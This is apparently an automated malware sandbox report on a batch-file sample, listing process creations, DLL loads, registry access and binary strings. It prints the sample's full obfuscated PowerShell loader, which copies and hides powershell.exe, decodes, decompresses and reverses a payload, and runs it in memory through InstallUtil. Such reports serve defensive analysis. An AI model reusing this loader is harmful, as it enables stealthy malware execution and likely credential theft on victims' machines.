Source: C:\Windows\System32\xcopy.exe	Process created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\AppData\Roaming\ChannelUris.bat' \| Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)\| Out-Null"
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' \| Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)\| Out-Null"	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ChannelUris.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\AppData\Roaming\ChannelUris.bat' \| Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)\| Out-Null"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: atl.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: atl.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: 87M9Y3P4Z7.bat

Static file information: File size 1410688 > 1048576

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006797000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.00000000066F5000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004FC9000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289959595.0000000008940000.00000004.08000000.00040000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D7A000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000056C4000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E1D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006797000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.00000000066F5000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004FC9000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289959595.0000000008940000.00000004.08000000.00040000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D7A000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000056C4000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E1D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000000.2230623116.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, ChannelUris.bat.Zhe, 00000013.00000000.2381194622.0000000000248000.00000020.00000001.01000000.00000009.sdmp, ChannelUris.bat.Zhe.17.dr, 87M9Y3P4Z7.bat.Zhe.5.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp
